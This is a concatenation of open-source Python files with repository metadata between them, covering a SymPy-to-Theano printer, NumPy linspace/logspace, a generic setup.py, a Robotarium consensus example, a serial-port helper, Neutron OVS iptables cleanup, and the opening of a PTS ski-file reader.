sympy.Min: tt.minimum, # Sympy accept >2 inputs, Theano only 2
sympy.conjugate: tt.conj,
sympy.numbers.ImaginaryUnit: lambda:tt.complex(0,1),
# Matrices
sympy.MatAdd: tt.Elemwise(ts.add),
sympy.HadamardProduct: tt.Elemwise(ts.mul),
sympy.Trace: tlinalg.trace,
sympy.Determinant : tlinalg.det,
sympy.Inverse: tlinalg.matrix_inverse,
sympy.Transpose: tt.DimShuffle((False, False), [1, 0]),
}
class TheanoPrinter(Printer):
""" Code printer which creates Theano symbolic expression graphs.
Parameters
==========
cache : dict
Cache dictionary to use. If None (default) will use
the global cache. To create a printer which does not depend on or alter
global state pass an empty dictionary. Note: the dictionary is not
copied on initialization of the printer and will be updated in-place,
so using the same dict object when creating multiple printers or making
multiple calls to :func:`.theano_code` or :func:`.theano_function` means
the cache is shared between all these applications.
Attributes
==========
cache : dict
A cache of Theano variables which have been created for Sympy
symbol-like objects (e.g. :class:`sympy.core.symbol.Symbol` or
:class:`sympy.matrices.expressions.MatrixSymbol`). This is used to
ensure that all references to a given symbol in an expression (or
multiple expressions) are printed as the same Theano variable, which is
created only once. Symbols are differentiated only by name and type. The
format of the cache's contents should be considered opaque to the user.
"""
printmethod = "_theano"
def __init__(self, *args, **kwargs):
self.cache = kwargs.pop('cache', dict())
super(TheanoPrinter, self).__init__(*args, **kwargs)
def _get_key(self, s, name=None, dtype=None, broadcastable=None):
""" Get the cache key for a Sympy object.
Parameters
==========
s : sympy.core.basic.Basic
Sympy object to get key for.
name : str
Name of object, if it does not have a ``name`` attribute.
"""
if name is None:
name = s.name
return (name, type(s), s.args, dtype, broadcastable)
def _get_or_create(self, s, name=None, dtype=None, broadcastable=None):
"""
Get the Theano variable for a Sympy symbol from the cache, or create it
if it does not exist.
"""
# Defaults
if name is None:
name = s.name
if dtype is None:
dtype = 'floatX'
if broadcastable is None:
broadcastable = ()
key = self._get_key(s, name, dtype=dtype, broadcastable=broadcastable)
if key in self.cache:
return self.cache[key]
value = tt.tensor(name=name, dtype=dtype, broadcastable=broadcastable)
self.cache[key] = value
return value
def _print_Symbol(self, s, **kwargs):
dtype = kwargs.get('dtypes', {}).get(s)
bc = kwargs.get('broadcastables', {}).get(s)
return self._get_or_create(s, dtype=dtype, broadcastable=bc)
def _print_AppliedUndef(self, s, **kwargs):
name = str(type(s)) + '_' + str(s.args[0])
dtype = kwargs.get('dtypes', {}).get(s)
bc = kwargs.get('broadcastables', {}).get(s)
return self._get_or_create(s, name=name, dtype=dtype, broadcastable=bc)
def _print_Basic(self, expr, **kwargs):
op = mapping[type(expr)]
children = [self._print(arg, **kwargs) for arg in expr.args]
return op(*children)
def _print_Number(self, n, **kwargs):
# Integers already taken care of below, interpret as float
return float(n.evalf())
def _print_MatrixSymbol(self, X, **kwargs):
dtype = kwargs.get('dtypes', {}).get(X)
return self._get_or_create(X, dtype=dtype, broadcastable=(None, None))
def _print_DenseMatrix(self, X, **kwargs):
if not hasattr(tt, 'stacklists'):
raise NotImplementedError(
"Matrix translation not yet supported in this version of Theano")
return tt.stacklists([
[self._print(arg, **kwargs) for arg in L]
for L in X.tolist()
])
_print_ImmutableMatrix = _print_ImmutableDenseMatrix = _print_DenseMatrix
def _print_MatMul(self, expr, **kwargs):
children = [self._print(arg, **kwargs) for arg in expr.args]
result = children[0]
for child in children[1:]:
result = tt.dot(result, child)
return result
def _print_MatPow(self, expr, **kwargs):
children = [self._print(arg, **kwargs) for arg in expr.args]
result = 1
if isinstance(children[1], int) and children[1] > 0:
for i in range(children[1]):
result = tt.dot(result, children[0])
else:
raise NotImplementedError('''Only non-negative integer
powers of matrices can be handled by Theano at the moment''')
return result
def _print_MatrixSlice(self, expr, **kwargs):
parent = self._print(expr.parent, **kwargs)
rowslice = self._print(slice(*expr.rowslice), **kwargs)
colslice = self._print(slice(*expr.colslice), **kwargs)
return parent[rowslice, colslice]
def _print_BlockMatrix(self, expr, **kwargs):
nrows, ncols = expr.blocks.shape
blocks = [[self._print(expr.blocks[r, c], **kwargs)
for c in range(ncols)]
for r in range(nrows)]
return tt.join(0, *[tt.join(1, *row) for row in blocks])
def _print_slice(self, expr, **kwargs):
return slice(*[self._print(i, **kwargs)
if isinstance(i, sympy.Basic) else i
for i in (expr.start, expr.stop, expr.step)])
def _print_Pi(self, expr, **kwargs):
return 3.141592653589793
def _print_Piecewise(self, expr, **kwargs):
import numpy as np
e, cond = expr.args[0].args # First condition and corresponding value
# Print conditional expression and value for first condition
p_cond = self._print(cond, **kwargs)
p_e = self._print(e, **kwargs)
# One condition only
if len(expr.args) == 1:
# Return value if condition else NaN
return tt.switch(p_cond, p_e, np.nan)
# Return value_1 if condition_1 else evaluate remaining conditions
p_remaining = self._print(sympy.Piecewise(*expr.args[1:]), **kwargs)
return tt.switch(p_cond, p_e, p_remaining)
def _print_Rational(self, expr, **kwargs):
return tt.true_div(self._print(expr.p, **kwargs),
self._print(expr.q, **kwargs))
def _print_Integer(self, expr, **kwargs):
return expr.p
def _print_factorial(self, expr, **kwargs):
return self._print(sympy.gamma(expr.args[0] + 1), **kwargs)
def _print_Derivative(self, deriv, **kwargs):
rv = self._print(deriv.expr, **kwargs)
for var in deriv.variables:
var = self._print(var, **kwargs)
rv = tt.Rop(rv, var, tt.ones_like(var))
return rv
def emptyPrinter(self, expr):
return expr
def doprint(self, expr, dtypes=None, broadcastables=None):
""" Convert a Sympy expression to a Theano graph variable.
The ``dtypes`` and ``broadcastables`` arguments are used to specify the
data type, dimension, and broadcasting behavior of the Theano variables
corresponding to the free symbols in ``expr``. Each is a mapping from
Sympy symbols to the value of the corresponding argument to
``theano.tensor.Tensor``.
See the corresponding `documentation page`__ for more information on
broadcasting in Theano.
.. __: http://deeplearning.net/software/theano/tutorial/broadcasting.html
Parameters
==========
expr : sympy.core.expr.Expr
Sympy expression to print.
dtypes : dict
Mapping from Sympy symbols to Theano datatypes to use when creating
new Theano variables for those symbols. Corresponds to the ``dtype``
argument to ``theano.tensor.Tensor``. Defaults to ``'floatX'``
for symbols not included in the mapping.
broadcastables : dict
Mapping from Sympy symbols to the value of the ``broadcastable``
argument to ``theano.tensor.Tensor`` to use when creating Theano
variables for those symbols. Defaults to the empty tuple for symbols
not included in the mapping (resulting in a scalar).
Returns
=======
theano.gof.graph.Variable
A variable corresponding to the expression's value in a Theano
symbolic expression graph.
"""
if dtypes is None:
dtypes = {}
if broadcastables is None:
broadcastables = {}
return self._print(expr, dtypes=dtypes, broadcastables=broadcastables)
global_cache = {}
def theano_code(expr, cache=None, **kwargs):
"""
Convert a Sympy expression into a Theano graph variable.
Parameters
==========
expr : sympy.core.expr.Expr
Sympy expression object to convert.
cache : dict
Cached Theano variables (see :class:`TheanoPrinter.cache
<TheanoPrinter>`). Defaults to the module-level global cache.
dtypes : dict
Passed to :meth:`.TheanoPrinter.doprint`.
broadcastables : dict
Passed to :meth:`.TheanoPrinter.doprint`.
Returns
=======
theano.gof.graph.Variable
A variable corresponding to the expression's value in a Theano symbolic
expression graph.
"""
if not theano:
raise ImportError("theano is required for theano_code")
if cache is None:
cache = global_cache
return TheanoPrinter(cache=cache, settings={}).doprint(expr, **kwargs)
def dim_handling(inputs, dim=None, dims=None, broadcastables=None):
r"""
Get value of ``broadcastables`` argument to :func:`.theano_code` from
keyword arguments to :func:`.theano_function`.
Included for backwards compatibility.
Parameters
==========
inputs
Sequence of input symbols.
dim : int
Common number of dimensions for all inputs. Overrides other arguments
if given.
dims : dict
Mapping from input symbols to number of dimensions. Overrides
``broadcastables`` argument if given.
broadcastables : dict
Explicit value of ``broadcastables`` argument to
:meth:`.TheanoPrinter.doprint`. If not None function will return this value unchanged.
Returns
=======
dict
Dictionary mapping elements of ``inputs`` to their "broadcastable"
values (tuple of ``bool``\ s).
"""
if dim is not None:
return {s: (False,) * dim for s in inputs}
if dims is not None:
maxdim = max(dims.values())
return {
s: (False,) * d + (True,) * (maxdim - d)
for s, d in dims.items()
}
if broadcastables is not None:
return broadcastables
return {}
def theano_function(inputs, outputs, scalar=False, **kwargs):
"""
Create a Theano function from SymPy expressions.
The inputs and outputs are converted to Theano variables using
:func:`.theano_code` and then passed to ``theano.function``.
Parameters
==========
inputs
Sequence of symbols which constitute the inputs of the function.
outputs
Sequence of expressions which constitute the outputs(s) of the
function. The free symbols of each expression must be a subset of
``inputs``.
scalar : bool
Convert 0-dimensional arrays in output to scalars. This will return a
Python wrapper function around the Theano function object.
cache : dict
Cached Theano variables (see :class:`TheanoPrinter.cache
<TheanoPrinter>`). Defaults to the module-level global cache.
dtypes : dict
Passed to :meth:`.TheanoPrinter.doprint`.
broadcastables : dict
Passed to :meth:`.TheanoPrinter.doprint`.
dims : dict
Alternative to ``broadcastables`` argument. Mapping from elements of
``inputs`` to integers indicating the dimension of their associated
arrays/tensors. Overrides ``broadcastables`` argument if given.
dim : int
Another alternative to the ``broadcastables`` argument. Common number of
dimensions to use for all arrays/tensors.
``theano_function([x, y], [...], dim=2)`` is equivalent to using
``broadcastables={x: (False, False), y: (False, False)}``.
Returns
=======
callable
A callable object which takes values of ``inputs`` as positional
arguments and returns an output array for each of the expressions
in ``outputs``. If ``outputs`` is a single expression the function will
return a Numpy array, if it is a list of multiple expressions the
function will return a list of arrays. See description of the ``squeeze``
argument above for the behavior when a single output is passed in a list.
The returned object will either be an instance of
``theano.compile.function_module.Function`` or a Python wrapper
function around one. In both cases, the returned value will have a
``theano_function`` attribute which points to the return value of
``theano.function``.
Examples
========
>>> from sympy.abc import x, y, z
>>> from sympy.printing.theanocode import theano_function
A simple function with one input and one output:
>>> f1 = theano_function([x], [x**2 - 1], scalar=True)
>>> f1(3)
8.0
A function with multiple inputs and one output:
>>> f2 = theano_function([x, y, z], [(x**z + y**z)**(1/z)], scalar=True)
>>> f2(3, 4, 2)
5.0
A function with multiple inputs and multiple outputs:
>>> f3 = theano_function([x, y], [x**2 + y**2, x**2 - y**2], scalar=True)
>>> f3(2, 3)
[13.0, -5.0]
See also
========
dim_handling
"""
if not theano:
raise ImportError("theano is required for theano_function")
# Pop off non-theano keyword args
cache = kwargs.pop('cache', {})
dtypes = kwargs.pop('dtypes', {})
broadcastables = dim_handling(
inputs,
dim=kwargs.pop('dim', None),
dims=kwargs.pop('dims', None),
broadcastables=kwargs.pop('broadcastables', None),
)
# Print inputs/outputs
code = partial(theano_code, cache=cache, dtypes=dtypes,
broadcastables=broadcastables)
tinputs = list(map(code, inputs))
toutputs = list(map(code, outputs))
#fix constant expressions as variables
toutputs = [output if isinstance(output, theano.Variable) else tt.as_tensor_variable(output) for output in toutputs]
if len(toutputs) == 1:
toutputs = toutputs[0]
# Compile theano func
func = theano.function(tinputs, toutputs, **kwargs)
is_0d = [len(o.variable.broadcastable) == 0 for o in func.outputs]
# No wrapper required
if not scalar or not any(is_0d):
func.theano_function = func
return func
# Create wrapper to convert 0-dimensional outputs to scalars
def wrapper(*args):
out = func(*args)
# out can be array(1.0) or [array(1.0), array(2.0)]
if is_sequence(out):
return [o[()] if is_0d[i] else o for i, o in enumerate(out)]
else:
return out[()]
wrapper.__wrapped__ = func
wrapper.__doc__ = func.__doc__
wrapper.theano_function = func
return wrapper
| 33.382576
| 120
| 0.613355
|
05fea557a5eabb70af6d2403a59815a85a2e0ba6
| 7,636
|
py
|
Python
|
numpy/core/function_base.py
|
leifdenby/numpy
|
4750c2810c5e0943cbea8e2acc0337c4e66a9bb2
|
[
"BSD-3-Clause"
] | 1
|
2021-01-06T21:28:45.000Z
|
2021-01-06T21:28:45.000Z
|
numpy/core/function_base.py
|
leifdenby/numpy
|
4750c2810c5e0943cbea8e2acc0337c4e66a9bb2
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/core/function_base.py
|
leifdenby/numpy
|
4750c2810c5e0943cbea8e2acc0337c4e66a9bb2
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, absolute_import, print_function
__all__ = ['logspace', 'linspace', 'may_share_memory']
from . import numeric as _nx
from .numeric import result_type, NaN, shares_memory, MAY_SHARE_BOUNDS, TooHardError
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None):
"""
Return evenly spaced numbers over a specified interval.
Returns `num` evenly spaced samples, calculated over the
interval [`start`, `stop`].
The endpoint of the interval can optionally be excluded.
Parameters
----------
start : scalar
The starting value of the sequence.
stop : scalar
The end value of the sequence, unless `endpoint` is set to False.
In that case, the sequence consists of all but the last of ``num + 1``
evenly spaced samples, so that `stop` is excluded. Note that the step
size changes when `endpoint` is False.
num : int, optional
Number of samples to generate. Default is 50. Must be non-negative.
endpoint : bool, optional
If True, `stop` is the last sample. Otherwise, it is not included.
Default is True.
retstep : bool, optional
If True, return (`samples`, `step`), where `step` is the spacing
between samples.
dtype : dtype, optional
The type of the output array. If `dtype` is not given, infer the data
type from the other input arguments.
.. versionadded:: 1.9.0
Returns
-------
samples : ndarray
There are `num` equally spaced samples in the closed interval
``[start, stop]`` or the half-open interval ``[start, stop)``
(depending on whether `endpoint` is True or False).
step : float
Only returned if `retstep` is True
Size of spacing between samples.
See Also
--------
arange : Similar to `linspace`, but uses a step size (instead of the
number of samples).
logspace : Samples uniformly distributed in log space.
Examples
--------
>>> np.linspace(2.0, 3.0, num=5)
array([ 2. , 2.25, 2.5 , 2.75, 3. ])
>>> np.linspace(2.0, 3.0, num=5, endpoint=False)
array([ 2. , 2.2, 2.4, 2.6, 2.8])
>>> np.linspace(2.0, 3.0, num=5, retstep=True)
(array([ 2. , 2.25, 2.5 , 2.75, 3. ]), 0.25)
Graphical illustration:
>>> import matplotlib.pyplot as plt
>>> N = 8
>>> y = np.zeros(N)
>>> x1 = np.linspace(0, 10, N, endpoint=True)
>>> x2 = np.linspace(0, 10, N, endpoint=False)
>>> plt.plot(x1, y, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.plot(x2, y + 0.5, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.ylim([-0.5, 1])
(-0.5, 1)
>>> plt.show()
"""
num = int(num)
if num < 0:
raise ValueError("Number of samples, %s, must be non-negative." % num)
div = (num - 1) if endpoint else num
# Convert float/complex array scalars to float, gh-3504
start = start * 1.
stop = stop * 1.
dt = result_type(start, stop, float(num))
if dtype is None:
dtype = dt
y = _nx.arange(0, num, dtype=dt)
if num > 1:
delta = stop - start
step = delta / div
if step == 0:
# Special handling for denormal numbers, gh-5437
y /= div
y *= delta
else:
y *= step
else:
# 0 and 1 item long sequences have an undefined step
step = NaN
y += start
if endpoint and num > 1:
y[-1] = stop
if retstep:
return y.astype(dtype, copy=False), step
else:
return y.astype(dtype, copy=False)
def logspace(start, stop, num=50, endpoint=True, base=10.0, dtype=None):
"""
Return numbers spaced evenly on a log scale.
In linear space, the sequence starts at ``base ** start``
(`base` to the power of `start`) and ends with ``base ** stop``
(see `endpoint` below).
Parameters
----------
start : float
``base ** start`` is the starting value of the sequence.
stop : float
``base ** stop`` is the final value of the sequence, unless `endpoint`
is False. In that case, ``num + 1`` values are spaced over the
interval in log-space, of which all but the last (a sequence of
length ``num``) are returned.
num : integer, optional
Number of samples to generate. Default is 50.
endpoint : boolean, optional
If true, `stop` is the last sample. Otherwise, it is not included.
Default is True.
base : float, optional
The base of the log space. The step size between the elements in
``ln(samples) / ln(base)`` (or ``log_base(samples)``) is uniform.
Default is 10.0.
dtype : dtype
The type of the output array. If `dtype` is not given, infer the data
type from the other input arguments.
Returns
-------
samples : ndarray
`num` samples, equally spaced on a log scale.
See Also
--------
arange : Similar to linspace, with the step size specified instead of the
number of samples. Note that, when used with a float endpoint, the
endpoint may or may not be included.
linspace : Similar to logspace, but with the samples uniformly distributed
in linear space, instead of log space.
Notes
-----
Logspace is equivalent to the code
>>> y = np.linspace(start, stop, num=num, endpoint=endpoint)
... # doctest: +SKIP
>>> power(base, y).astype(dtype)
... # doctest: +SKIP
Examples
--------
>>> np.logspace(2.0, 3.0, num=4)
array([ 100. , 215.443469 , 464.15888336, 1000. ])
>>> np.logspace(2.0, 3.0, num=4, endpoint=False)
array([ 100. , 177.827941 , 316.22776602, 562.34132519])
>>> np.logspace(2.0, 3.0, num=4, base=2.0)
array([ 4. , 5.0396842 , 6.34960421, 8. ])
Graphical illustration:
>>> import matplotlib.pyplot as plt
>>> N = 10
>>> x1 = np.logspace(0.1, 1, N, endpoint=True)
>>> x2 = np.logspace(0.1, 1, N, endpoint=False)
>>> y = np.zeros(N)
>>> plt.plot(x1, y, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.plot(x2, y + 0.5, 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.ylim([-0.5, 1])
(-0.5, 1)
>>> plt.show()
"""
y = linspace(start, stop, num=num, endpoint=endpoint)
if dtype is None:
return _nx.power(base, y)
return _nx.power(base, y).astype(dtype)
def may_share_memory(a, b, max_work=None):
"""Determine if two arrays can share memory
A return of True does not necessarily mean that the two arrays
share any element. It just means that they *might*.
Only the memory bounds of a and b are checked by default.
Parameters
----------
a, b : ndarray
Input arrays
max_work : int, optional
Effort to spend on solving the overlap problem. See
`shares_memory` for details. Default for ``may_share_memory``
is to do a bounds check.
Returns
-------
out : bool
See Also
--------
shares_memory
Examples
--------
>>> np.may_share_memory(np.array([1,2]), np.array([5,8,9]))
False
>>> x = np.zeros([3, 4])
>>> np.may_share_memory(x[:,0], x[:,1])
True
"""
if max_work is None:
max_work = MAY_SHARE_BOUNDS
try:
return shares_memory(a, b, max_work=max_work)
except (TooHardError, OverflowError):
# Unable to determine, assume yes
return True
| 30.91498
| 84
| 0.583944
|
0b244a62d7021362d8739c19e7ef6455d6111072
| 2,669
|
py
|
Python
|
setup.py
|
CryptoChris7/Universal-setup.py
|
8dbb49729e6e1d9cdbc81b5e1cad9cccecdde4a3
|
[
"MIT"
] | null | null | null |
setup.py
|
CryptoChris7/Universal-setup.py
|
8dbb49729e6e1d9cdbc81b5e1cad9cccecdde4a3
|
[
"MIT"
] | null | null | null |
setup.py
|
CryptoChris7/Universal-setup.py
|
8dbb49729e6e1d9cdbc81b5e1cad9cccecdde4a3
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
import os
import re
import ast
HTTP = re.compile('^https?://.+#egg=(.+)$')
class UniversalSetupError(Exception):
pass
def parse_dependency_info() -> dict:
"""Reads dependency info from requirements.txt"""
packages = []
links = []
try:
with open('requirements.txt') as dependencies:
for line in map(str.strip, dependencies):
link = HTTP.match(line)
if link:
packages.append(link.group(1))
links.append(line)
else:
packages.append(line)
except FileNotFoundError:
print('Missing requirements.txt')
return {'install_requires': packages, 'dependency_links': links}
def read_metadata() -> dict:
"""Finds the package to install and returns it's metadata."""
for entry in os.scandir():
if entry.is_dir():
package_init = os.path.join(entry.name, '__init__.py')
if os.path.isfile(package_init):
break
else:
raise UniversalSetupError('No package found!')
metadata = {'name': entry.name}
meta_names = {'__version__': 'version',
'__author__': 'author',
'__email__': 'author_email',
'__license__': 'license'}
with open(package_init) as init:
code = init.read()
try:
tree = ast.parse(code)
except SyntaxError as exc:
msg = 'Bad syntax in package init: %s'
raise UniversalSetupError(msg % repr(package_init)) from exc
docstring = ast.get_docstring(tree)
if docstring is not None:
metadata['description'] = docstring.split('\n')[0].strip()
else:
print('Missing package docstring!')
for node in ast.iter_child_nodes(tree):
try:
value = node.value
name = node.targets[0].id
if name in meta_names:
meta_name = meta_names[name]
if meta_name in metadata:
msg = 'Repeat metadata assignment on line %d for item %s.'
print(msg % (node.lineno, repr(name)))
metadata[meta_name] = value.s
except AttributeError:
pass
unused_names = []
for name in meta_names:
meta_name = meta_names[name]
if meta_name not in metadata:
unused_names.append(name)
if unused_names:
print('The folowing metadata is missing: %s' % ', '.join(unused_names))
metadata['packages'] = find_packages()
metadata.update(parse_dependency_info())
return metadata
setup(**read_metadata())
| 29.655556
| 79
| 0.581491
|
f19afde0df670789cde6cdea385d704974c118e8
| 2,209
|
py
|
Python
|
rps/examples/consensus/consensus_fewer_errors.py
|
cglacet/robotarium_python_simulator
|
b58ad6b201f404d0b079dc695f68d916260cc9d1
|
[
"MIT"
] | 69
|
2017-09-28T22:30:43.000Z
|
2022-03-08T15:01:44.000Z
|
rps/examples/consensus/consensus_fewer_errors.py
|
thomaswim/PIR
|
1561f971ee7cc7b1d065a3a6ed5060d6539811ef
|
[
"MIT"
] | 12
|
2017-11-23T18:25:12.000Z
|
2022-02-17T18:06:31.000Z
|
rps/examples/consensus/consensus_fewer_errors.py
|
thomaswim/PIR
|
1561f971ee7cc7b1d065a3a6ed5060d6539811ef
|
[
"MIT"
] | 37
|
2017-11-23T18:15:24.000Z
|
2022-02-15T17:28:09.000Z
|
import rps.robotarium as robotarium
from rps.utilities.graph import *
from rps.utilities.transformations import *
from rps.utilities.barrier_certificates import *
from rps.utilities.misc import *
from rps.utilities.controllers import *
import numpy as np
# Instantiate Robotarium object
N = 12
r = robotarium.Robotarium(number_of_robots=N, show_figure=True, sim_in_real_time=True)
# How many iterations do we want (about N*0.033 seconds)
iterations = 1000
#Maximum linear speed of robot specified by motors
magnitude_limit = 0.15
# We're working in single-integrator dynamics, and we don't want the robots
# to collide or drive off the testbed. Thus, we're going to use barrier certificates
si_barrier_cert = create_single_integrator_barrier_certificate_with_boundary()
# Create SI to UNI dynamics tranformation
si_to_uni_dyn, uni_to_si_states = create_si_to_uni_mapping()
# Generated a connected graph Laplacian (for a cylce graph).
L = cycle_GL(N)
for k in range(iterations):
# Get the poses of the robots and convert to single-integrator poses
x = r.get_poses()
x_si = uni_to_si_states(x)
# Initialize the single-integrator control inputs
si_velocities = np.zeros((2, N))
# For each robot...
for i in range(N):
# Get the neighbors of robot 'i' (encoded in the graph Laplacian)
j = topological_neighbors(L, i)
# Compute the consensus algorithm
si_velocities[:, i] = np.sum(x_si[:, j] - x_si[:, i, None], 1)
#Keep single integrator control vectors under specified magnitude
# Threshold control inputs
norms = np.linalg.norm(dxi, 2, 0)
idxs_to_normalize = (norms > magnitude_limit)
dxi[:, idxs_to_normalize] *= magnitude_limit/norms[idxs_to_normalize]
# Use the barrier certificate to avoid collisions
si_velocities = si_barrier_cert(si_velocities, x_si)
# Transform single integrator to unicycle
dxu = si_to_uni_dyn(si_velocities, x)
# Set the velocities of agents 1,...,N
r.set_velocities(np.arange(N), dxu)
# Iterate the simulation
r.step()
#Call at end of script to print debug information and for your script to run on the Robotarium server properly
r.call_at_scripts_end()
| 33.469697
| 110
| 0.741059
|
83e5e475f21c67047e500bc73598e90089aed40d
| 1,495
|
py
|
Python
|
test_bench/serial_ctrl.py
|
LogicPi-cn/SerialMasterPyqt5
|
a6598101e5d4d617f1e3f3785d2a9c5ed2df604e
|
[
"MIT"
] | null | null | null |
test_bench/serial_ctrl.py
|
LogicPi-cn/SerialMasterPyqt5
|
a6598101e5d4d617f1e3f3785d2a9c5ed2df604e
|
[
"MIT"
] | null | null | null |
test_bench/serial_ctrl.py
|
LogicPi-cn/SerialMasterPyqt5
|
a6598101e5d4d617f1e3f3785d2a9c5ed2df604e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import paho.mqtt.client as mqtt
import time
import hashlib
import hmac
import random
import json
import serial
import serial.tools.list_ports
import datetime
import threading
# 串口句柄
g_serial = None
# 串口已打开
g_port_is_open = False
# 接收线程运行标志位
g_rec_run = False
# 接收计数
g_rec_cnt = 0
# 发送计数
g_snd_cnt = 0
def log_print(str):
"""
带时间日期的打印信息输出
"""
now = datetime.datetime.now()
otherStyleTime = now.strftime("%Y-%m-%d %H:%M:%S")
msg = otherStyleTime + " - " + str
print(msg)
def get_serial():
"""
获取串口列表
"""
plist = list(serial.tools.list_ports.comports())
result = []
if len(plist) > 0:
for p in list(plist):
result.append(p[0])
return result
def open_port(ss, bps):
"""
打开串口
"""
port = None
try:
port = serial.Serial(ss, bps)
if port.is_open:
# self.log_print("串口打开成功:" + str(ss))
pass
else:
log_print("串口打开失败:" + str(ss))
except Exception:
log_print("串口打开失败:" + str(ss))
return port
def close_port(port):
"""
关闭串口
"""
try:
port.close()
except Exception:
log_print("串口关闭失败:" + str(port))
def hex_str(argv):
"""
#十六进制显示
"""
result = ''
try:
hLen = len(argv)
for i in range(hLen):
hvol = argv[i]
hhex = '%02X'%hvol
result += hhex+' '
except:
pass
return result
| 17.183908
| 54
| 0.543813
|
c2ac8f5f7f823ee60760004cd40907079115fd55
| 3,589
|
py
|
Python
|
neutron/agent/linux/openvswitch_firewall/iptables.py
|
knodir/neutron
|
ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8
|
[
"Apache-2.0"
] | 1
|
2018-10-19T01:48:37.000Z
|
2018-10-19T01:48:37.000Z
|
neutron/agent/linux/openvswitch_firewall/iptables.py
|
knodir/neutron
|
ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
neutron/agent/linux/openvswitch_firewall/iptables.py
|
knodir/neutron
|
ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import constants as n_const
def get_device_port_name(port_id):
return ('qvo' + port_id)[:n_const.LINUX_DEV_LEN]
def get_iptables_driver_instance():
"""Load hybrid iptables firewall driver."""
from neutron.agent.linux import iptables_firewall
class HybridIptablesHelper(
iptables_firewall.OVSHybridIptablesFirewallDriver):
"""Don't remove conntrack when removing iptables rules."""
def _remove_conntrack_entries_from_port_deleted(self, port):
pass
return HybridIptablesHelper()
def is_bridge_cleaned(bridge):
other_config = bridge.db_get_val(
'Bridge', bridge.br_name, 'other_config')
return other_config.get(Helper.CLEANED_METADATA, '').lower() == 'true'
class Helper(object):
"""Helper to avoid loading firewall driver.
The main purpose is to avoid loading iptables driver for cases where no
ports have hybrid plugging on given node.
The helper stores metadata for iptables cleanup into br-int ovsdb Bridge
table. Specifically it checks for other_config['iptables_cleaned'] boolean
value.
"""
HYBRID_PORT_PREFIX = 'qvo'
CLEANED_METADATA = 'iptables_cleaned'
def __init__(self, int_br):
self.int_br = int_br
self.hybrid_ports = None
self.iptables_driver = None
def load_driver_if_needed(self):
self.hybrid_ports = self.get_hybrid_ports()
if self.hybrid_ports and self.has_not_been_cleaned:
self.iptables_driver = get_iptables_driver_instance()
def get_hybrid_ports(self):
"""Return True if there is a port with hybrid plugging."""
return {
port_name for port_name in self.int_br.get_port_name_list()
if port_name.startswith(self.HYBRID_PORT_PREFIX)}
def cleanup_port(self, port):
if not self.iptables_driver:
return
device_name = get_device_port_name(port['device'])
try:
self.hybrid_ports.remove(device_name)
except KeyError:
# It's not a hybrid plugged port
return
# TODO(jlibosva): Optimize, add port to firewall without installing
# iptables rules and then call remove from firewall
self.iptables_driver.prepare_port_filter(port)
self.iptables_driver.remove_port_filter(port)
if not self.hybrid_ports:
self.mark_as_cleaned()
# Let GC remove iptables driver
self.iptables_driver = None
@property
def has_not_been_cleaned(self):
return not is_bridge_cleaned(self.int_br)
def mark_as_cleaned(self):
# TODO(jlibosva): Make it a single transaction
other_config = self.int_br.db_get_val(
'Bridge', self.int_br.br_name, 'other_config')
other_config[self.CLEANED_METADATA] = 'true'
self.int_br.set_db_attribute(
'Bridge', self.int_br.br_name, 'other_config', other_config)
| 35.534653
| 78
| 0.691
|
3d9ece2126d008e0106390a6ec2bb6b010731a0f
| 106,185
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/simulation/skifile.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/simulation/skifile.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/simulation/skifile.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.simulation.skifile Reading and updating a SKIRT parameter file.
#
# An instance of the SkiFile class in this module allows reading from and updating an existing ski file.
# -----------------------------------------------------------------
# Import standard modules
import os.path
import copy
from datetime import datetime
from lxml import etree
from numpy import arctan
import warnings
# Import the relevant PTS classes and modules
from .units import SkirtUnits
from ..basics.filter import Filter
from ..tools import archive as arch
# -----------------------------------------------------------------
# SkiFile class
# -----------------------------------------------------------------
## An instance of the SkiFile class represents a particular existing SKIRT parameter file (\em ski file).
# There are functions to read and/or update certain information in the ski file, such as obtaining or setting
# the value of a particular parameter. The intention is to encapsulate any knowledge about the ski file format
# and structure within this class, concentrating the update pain if and when that format changes.
# Consequently the public functions in this class are quite high-level, and specific rather than generic.
#
# Updates made to a SkiFile instance do \em not affect the underlying file; use the saveto() function to save
